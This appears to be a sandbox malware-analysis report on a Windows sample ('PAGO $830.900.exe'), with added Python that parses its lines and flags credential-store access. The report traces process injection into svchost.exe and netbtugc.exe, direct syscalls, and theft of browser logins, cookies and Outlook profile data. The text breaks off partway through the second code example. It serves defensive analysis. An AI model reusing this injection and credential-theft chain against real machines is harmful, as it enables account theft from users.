            Source: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe | NtDeviceIoControlFile: Direct from: 0x76EF2AEC
            Source: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe | NtAllocateVirtualMemory: Direct from: 0x76EF2BEC
            Source: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe | NtQueryInformationToken: Direct from: 0x76EF2CAC
            Source: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe | NtCreateFile: Direct from: 0x76EF2FEC
            Source: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe | NtOpenFile: Direct from: 0x76EF2DCC
            Source: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe | NtTerminateThread: Direct from: 0x76EF2FCC
            Source: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe | NtOpenKeyEx: Direct from: 0x76EF2B9C
            Source: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe | NtSetInformationProcess: Direct from: 0x76EF2C5C
            Source: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe | NtProtectVirtualMemory: Direct from: 0x76EF2F9C
            Source: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe | NtWriteVirtualMemory: Direct from: 0x76EF2E3C
            Source: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe | NtNotifyChangeKey: Direct from: 0x76EF3C2C
            Source: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe | NtCreateMutant: Direct from: 0x76EF35CC
            Source: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe | NtResumeThread: Direct from: 0x76EF36AC
            Source: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe | NtMapViewOfSection: Direct from: 0x76EF2D1C
            Source: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe | NtProtectVirtualMemory: Direct from: 0x76EE7B2E
            Source: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe | NtAllocateVirtualMemory: Direct from: 0x76EF2BFC
            Source: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe | NtQuerySystemInformation: Direct from: 0x76EF2DFC
            Source: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe | NtReadFile: Direct from: 0x76EF2ADC
            Source: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe | NtDelayExecution: Direct from: 0x76EF2DDC
            Source: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe | NtQueryInformationProcess: Direct from: 0x76EF2C26
            Source: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe | NtResumeThread: Direct from: 0x76EF2FBC
            Source: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe | NtCreateUserProcess: Direct from: 0x76EF371C
            Source: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe | NtAllocateVirtualMemory: Direct from: 0x76EF3C9C
            Source: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe | NtWriteVirtualMemory: Direct from: 0x76EF490C
            Source: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe | NtSetInformationThread: Direct from: 0x76EE63F9
            Source: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe | NtClose: Direct from: 0x76EF2B6C
            Source: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe | NtSetInformationThread: Direct from: 0x76EF2B4C
            Source: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe | NtReadVirtualMemory: Direct from: 0x76EF2E8C
            Source: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe | NtCreateKey: Direct from: 0x76EF2C6C
            Source: C:\Users\user\Desktop\PAGO $830.900.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\netbtugc.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: NULL target: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe protection: read write
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: NULL target: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\netbtugc.exe | Thread register set: target process: 1600
            Source: C:\Windows\SysWOW64\netbtugc.exe | Thread APC queued: target process: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe
            Source: C:\Users\user\Desktop\PAGO $830.900.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 308C008
            Source: C:\Users\user\Desktop\PAGO $830.900.exe | Code function: 0_2_00DD1145 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,
            Source: C:\Users\user\Desktop\PAGO $830.900.exe | Code function: 0_2_00D7445D GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,
            Source: C:\Users\user\Desktop\PAGO $830.900.exe | Code function: 0_2_00D8EFAD GetForegroundWindow,FindWindowW,IsIconic,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,ShowWindow,
            Source: C:\Users\user\Desktop\PAGO $830.900.exe | Code function: 0_2_00DDE2D7 mouse_event,
            Source: C:\Users\user\Desktop\PAGO $830.900.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PAGO $830.900.exe"
            Source: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe | Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
            Source: C:\Windows\SysWOW64\netbtugc.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\PAGO $830.900.exe | Code function: 0_2_00DD0AA6 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,
            Source: C:\Users\user\Desktop\PAGO $830.900.exe | Code function: 0_2_00DD15A7 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,
            Source: PAGO $830.900.exe | Binary or memory string: @EXITMETHOD@EXITCODEShell_TrayWnd%s#comments-end#ceCALLGUICTRLREGISTERLISTVIEWSORTGUICTRLCREATELISTVIEWITEMGUICTRLCREATETREEVIEWITEMGUICTRLCREATECONTEXTMENUONAUTOITEXITUNREGISTERGUICTRLCREATELISTVIEWGUICTRLCREATEMENUITEMGUICTRLCREATECHECKBOXGUICTRLCREATEMONTHCALGUICTRLCREATEPROGRESSGUICTRLCREATETREEVIEWGUICTRLCREATEGRAPHICSTRINGFROMASCIIARRAYONAUTOITEXITREGISTERGUICTRLCREATETABITEMGUICTRLSETDEFBKCOLORINIREADSECTIONNAMESGUICTRLCREATEBUTTONDLLCALLBACKREGISTERGUICTRLCREATEUPDOWNGUICTRLCREATESLIDERSTRINGREGEXPREPLACEOBJCREATEINTERFACEGUICTRLSENDTODUMMYFILECREATESHORTCUTGUICTRLCREATEINPUTSOUNDSETWAVEVOLUMEFILECREATENTFSLINKGUISETACCELERATORSGUICTRLCREATECOMBOGUICTRLSETDEFCOLORPROCESSSETPRIORITYGUICTRLSETRESIZINGSTRINGTOASCIIARRAYDRIVEGETFILESYSTEMGUICTRLCREATEDUMMYTRAYITEMSETONEVENTGUICTRLCREATERADIOWINMINIMIZEALLUNDOGUICTRLCREATEGROUPGUICTRLCREATELABELAUTOITWINSETTITLEGUICTRLSETBKCOLORAUTOITWINGETTITLEGUICTRLSETGRAPHICGUICTRLCREATEDATEGUICTRLCREATEICONGUICTRLSETONEVENTCONSOLEWRITEERRORDLLCALLBACKGETPTRGUICTRLCREATELISTTRAYITEMGETHANDLEFILEFINDFIRSTFILEGUICTRLCREATEEDITGUICTRLCREATEMENUWINMENUSELECTITEMGUICTRLSETCURSORDLLSTRUCTGETDATASTATUSBARGETTEXTFILERECYCLEEMPTYFILESELECTFOLDERTRAYITEMSETSTATEDLLSTRUCTSETDATATRAYITEMGETSTATEWINGETCLIENTSIZEGUICTRLCREATEAVIHTTPSETUSERAGENTGUICTRLCREATEPICCONTROLGETHANDLEGUIGETCURSORINFOTRAYSETPAUSEICONFILEFINDNEXTFILEINIRENAMESECTIONDLLSTRUCTGETSIZESHELLEXECUTEWAITPROCESSWAITCLOSEGUICTRLCREATETABFILEGETSHORTNAMEWINWAITNOTACTIVEGUICTRLCREATEOBJGUICTRLGETHANDLESTRINGTRIMRIGHTGUICTRLSETLIMITGUICTRLSETIMAGEINIWRITESECTIONCONTROLTREEVIEWAUTOITSETOPTIONGUICTRLSETCOLORDLLSTRUCTGETPTRADLIBUNREGISTERDRIVESPACETOTALGUICTRLSETSTATEWINGETCLASSLISTGUICTRLGETSTATEFILEGETSHORTCUTDLLSTRUCTCREATEPROCESSGETSTATSCONTROLGETFOCUSDLLCALLBACKFREEGUICTRLSETSTYLEFILEREADTOARRAYTRAYITEMSETTEXTCONTROLLISTVIEWTRAYITEMGETTEXTFILEGETENCODINGFILEGETLONGNAMEGUICTRLSENDMSGSENDKEEPACTIVEDRIVESPACEFREEFILEOPENDIALOGGUICTRLRECVMSGCONTROLCOMMANDSTRINGTOBINARYWINMINIMIZEALLSTRINGISXDIGITTRAYSETONEVENTFILESAVEDIALOGDUMMYSPEEDTESTCONTROLGETTEXTMOUSECLICKDRAGGUICTRLSETFONTMOUSEGETCURSORWINGETCARETPOSCONTROLSETTEXTTRAYITEMDELETESTRINGTRIMLEFTDRIVEGETSERIALBINARYTOSTRINGGUICTRLSETDATAINIREADSECTIONUDPCLOSESOCKETCONTROLDISABLETRAYCREATEMENUTCPCLOSESOCKETDLLCALLADDRESSFILEGETVERSIONGUIREGISTERMSGTRAYSETTOOLTIPTRAYCREATEITEMDRIVEGETDRIVESTRINGISASCIISTRINGCOMPARESTRINGISALPHAPROCESSEXISTSSTRINGREVERSESTRINGSTRIPCRSPLASHIMAGEONGUICTRLSETTIPGUISTARTGROUPCONTROLGETPOSFILEGETATTRIBADLIBREGISTERDRIVESETLABELGUICTRLDELETEFILECHANGEDIRFILEWRITELINEPIXELCHECKSUMDRIVEGETLABELGUICTRLSETPOSGUISETBKCOLORPIXELGETCOLORSTRINGISDIGITSTRINGISFLOATWINWAITACTIVESTRINGISALNUMSTRINGISLOWERSTRINGISSPACEGUISETONEVENTSTRINGREPLACESTRINGSTRIPWSCONTROLENABLESTRINGISUPPERWINGETPROCESSFILESETATTRIBCONTROLFOCUSFILEREADLINEPROCESSCLOSEGUISETCURSORSPLASHTEXTONSTRINGFORMATTRAYSETSTATESTRINGREGEXPCONTROLCLICKSHELLEXECUTETRAYSETCLICKWINWAITCLOSEHTTPSETPROXYDRIVEGETTYPEWINGETHANDLECONSOLEWRITEG
            Source: XXOIkqUXwzoOEy.exe, 00000003.00000002.4480127855.0000000000CD1000.00000002.00000001.00040000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000003.00000000.2155591562.0000000000CD1000.00000002.00000001.00040000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000006.00000000.2303401039.0000000000EB1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Program Manager
            Source: PAGO $830.900.exe, XXOIkqUXwzoOEy.exe, 00000003.00000002.4480127855.0000000000CD1000.00000002.00000001.00040000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000003.00000000.2155591562.0000000000CD1000.00000002.00000001.00040000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000006.00000000.2303401039.0000000000EB1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
            Source: XXOIkqUXwzoOEy.exe, 00000003.00000002.4480127855.0000000000CD1000.00000002.00000001.00040000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000003.00000000.2155591562.0000000000CD1000.00000002.00000001.00040000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000006.00000000.2303401039.0000000000EB1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
            Source: XXOIkqUXwzoOEy.exe, 00000003.00000002.4480127855.0000000000CD1000.00000002.00000001.00040000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000003.00000000.2155591562.0000000000CD1000.00000002.00000001.00040000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000006.00000000.2303401039.0000000000EB1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\PAGO $830.900.exe | Code function: 0_2_00D90618 cpuid
            Source: C:\Users\user\Desktop\PAGO $830.900.exe | Code function: 0_2_00DE80B3 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,
            Source: C:\Users\user\Desktop\PAGO $830.900.exe | Code function: 0_2_00DCDA16 GetUserNameW,
            Source: C:\Users\user\Desktop\PAGO $830.900.exe | Code function: 0_2_00DAB8F2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,
            Source: C:\Users\user\Desktop\PAGO $830.900.exe | Code function: 0_2_00D7615E GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,
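Read together, the lines of this section describe a chain rather than isolated events: the sample writes into and maps a section into a child svchost.exe that it created with its own command line, svchost.exe maps sections into XXOIkqUXwzoOEy.exe and netbtugc.exe, netbtugc.exe sets a thread context and queues an APC in XXOIkqUXwzoOEy.exe, and the injected process issues NtAllocateVirtualMemory, NtWriteVirtualMemory, NtProtectVirtualMemory, NtMapViewOfSection and NtResumeThread directly. As an added example (not part of the report, not Joe Sandbox code), the following Python parses lines in this section's format, rebuilds the cross-process edges and tallies the Nt* calls per process; the sample lines are copied from this report, while the regular expressions, the write-then-execute heuristic and the image/command-line mismatch check are this example's own.

```python
"""Rebuild the injection chain and syscall usage from Joe Sandbox signature lines.

Added example, not part of the report. It parses "Source: <process><signature>"
lines as they appear in the HIPS / PFW / Operating System Protection Evasion
section (the process path and the signature text are glued together, and a line
may end with the "Jump to behavior" link text). The heuristics are this
example's assumptions, not Joe Sandbox's logic.
"""
import ntpath
import re
from collections import Counter, defaultdict

SOURCE_RE = re.compile(
    r"^\s*Source:\s*(?P<proc>.+?\.exe)\s*\|?\s*(?P<rest>.+?)\s*(?:Jump to behavior)?\s*$"
)
SYSCALL_RE = re.compile(r"^(?P<name>Nt\w+): Direct from: 0x(?P<ret>[0-9A-Fa-f]+)$")
SECTION_RE = re.compile(r"^Section loaded: NULL target: (?P<target>.+?) protection: (?P<prot>.+)$")
WRITE_RE = re.compile(r"^Memory written: (?P<target>.+?) base: (?P<base>[0-9A-Fa-f]+)$")
APC_RE = re.compile(r"^Thread APC queued: target process: (?P<target>.+)$")
CONTEXT_RE = re.compile(r"^Thread register set: target process: (?P<pid>\d+)$")
CREATE_RE = re.compile(r'^Process created: (?P<image>.+?\.exe) "(?P<cmd>[^"]+)"$')

# Nt* calls that turn memory written into another process into running code.
EXECUTE_TRIGGERS = {
    "NtResumeThread", "NtQueueApcThread", "NtSetContextThread",
    "NtCreateThreadEx", "NtMapViewOfSection",
}


def describe_create(image: str, cmd: str) -> str:
    """A child whose command line names a different binary than its image is the
    holl owing / RunPE shape (create suspended, replace the image, resume)."""
    if ntpath.basename(image).lower() != ntpath.basename(cmd).lower():
        return f"process created, command line mismatch ({ntpath.basename(cmd)})"
    return "process created"


def parse(lines):
    """Return (syscalls, edges): per-process Nt* counters and (src, dst, how) edges."""
    syscalls = defaultdict(Counter)
    edges = []
    for line in lines:
        m = SOURCE_RE.match(line)
        if not m:
            continue
        proc, rest = m.group("proc"), m.group("rest")
        if (s := SYSCALL_RE.match(rest)):
            syscalls[proc][s.group("name")] += 1
        elif (s := SECTION_RE.match(rest)):
            edges.append((proc, s.group("target"), f"section mapped, {s.group('prot')}"))
        elif (s := WRITE_RE.match(rest)):
            edges.append((proc, s.group("target"), f"memory written at 0x{s.group('base')}"))
        elif (s := APC_RE.match(rest)):
            edges.append((proc, s.group("target"), "APC queued"))
        elif (s := CONTEXT_RE.match(rest)):
            edges.append((proc, f"pid {s.group('pid')}", "thread context set"))
        elif (s := CREATE_RE.match(rest)):
            edges.append((proc, s.group("image"), describe_create(s.group("image"), s.group("cmd"))))
    return syscalls, edges


def write_execute_suspects(syscalls) -> list:
    """Processes that allocate, write and re-protect memory and then trigger execution."""
    needed = {"NtAllocateVirtualMemory", "NtWriteVirtualMemory", "NtProtectVirtualMemory"}
    return [p for p, c in syscalls.items()
            if needed.issubset(c) and any(t in c for t in EXECUTE_TRIGGERS)]


def chain(edges) -> list:
    """Human-readable edges using image basenames."""
    return [f"{ntpath.basename(s)} -> {ntpath.basename(t)} [{how}]" for s, t, how in edges]


SAMPLE = r"C:\Users\user\Desktop\PAGO $830.900.exe"
SVCHOST = r"C:\Windows\SysWOW64\svchost.exe"
NETBT = r"C:\Windows\SysWOW64\netbtugc.exe"
INJECTED = r"C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe"

# Lines copied from this report's HIPS / PFW / Operating System Protection Evasion section.
REPORT_LINES = [
    f"Source: {INJECTED}NtAllocateVirtualMemory: Direct from: 0x76EF48ECJump to behavior",
    f"Source: {INJECTED}NtWriteVirtualMemory: Direct from: 0x76EF2E3CJump to behavior",
    f"Source: {INJECTED}NtProtectVirtualMemory: Direct from: 0x76EF2F9CJump to behavior",
    f"Source: {INJECTED}NtMapViewOfSection: Direct from: 0x76EF2D1CJump to behavior",
    f"Source: {INJECTED}NtResumeThread: Direct from: 0x76EF36ACJump to behavior",
    f"Source: {INJECTED}NtClose: Direct from: 0x76EF2B6C",
    f"Source: {SAMPLE}Section loaded: NULL target: {SVCHOST} protection: execute and read and writeJump to behavior",
    f"Source: {SVCHOST}Section loaded: NULL target: {INJECTED} protection: execute and read and writeJump to behavior",
    f"Source: {SVCHOST}Section loaded: NULL target: {NETBT} protection: execute and read and writeJump to behavior",
    f"Source: {NETBT}Thread register set: target process: 1600Jump to behavior",
    f"Source: {NETBT}Thread APC queued: target process: {INJECTED}Jump to behavior",
    f"Source: {SAMPLE}Memory written: {SVCHOST} base: 308C008Jump to behavior",
    f'Source: {SAMPLE}Process created: {SVCHOST} "{SAMPLE}"Jump to behavior',
    f'Source: {INJECTED}Process created: {NETBT} "{NETBT}"Jump to behavior',
]

if __name__ == "__main__":
    calls, links = parse(REPORT_LINES)
    print("\n".join(chain(links)))
    print("write-then-execute suspects:", [ntpath.basename(p) for p in write_execute_suspects(calls)])
```

The "Direct from" addresses are the return addresses the sandbox recorded for each Nt* call; the parser keeps them only to count calls, since the page itself does not say whether each one resolves inside ntdll. What the chain does show without further assumptions is that netbtugc.exe, a copy in SysWOW64 under a name that is not a Windows binary, is the process that later opens the browser and Outlook credential stores.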

            Stealing of Sensitive Information

            Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000004.00000002.4479452466.0000000003220000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.4482452521.0000000004C80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.4479040765.0000000002D80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.4480467614.00000000034A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2236251136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2237968521.0000000003E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2238057070.0000000006000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.4480505595.0000000004270000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\netbtugc.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
            Source: PAGO $830.900.exe | Binary or memory string: WIN_81
            Source: PAGO $830.900.exe | Binary or memory string: WIN_XP
            Source: PAGO $830.900.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
            Source: PAGO $830.900.exe | Binary or memory string: WIN_XPe
            Source: PAGO $830.900.exe | Binary or memory string: WIN_VISTA
            Source: PAGO $830.900.exe | Binary or memory string: WIN_7
            Source: PAGO $830.900.exe | Binary or memory string: WIN_8
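The file and registry accesses above are the stealer's collection step: Chromium-family Login Data, Cookies, Web Data and Local State (the DPAPI-wrapped key that decrypts the other files lives in Local State) plus the Outlook profile key. As an added example (not part of the report), the following Python shows the detection logic a SOC would run over file-open and registry-open telemetry for this behaviour: a process that is neither the browser nor the mail client touching those objects. The event shape, the allow-lists and the per-version Office profile key pattern are this example's assumptions; the netbtugc.exe accesses are the ones the report lists, the other events are constructed for contrast.

```python
"""Flag processes that open browser credential stores or mail profile keys
without being the application that owns them.

Added example, not part of the report. Events are dicts with the process image,
the kind of access ("file" or "registry") and the object path; this shape, the
allow-lists and the Office profile key pattern are assumptions of the example.
"""
import ntpath
import re

# Chromium-family credential / cookie stores. Chrome keeps "Local State" in the
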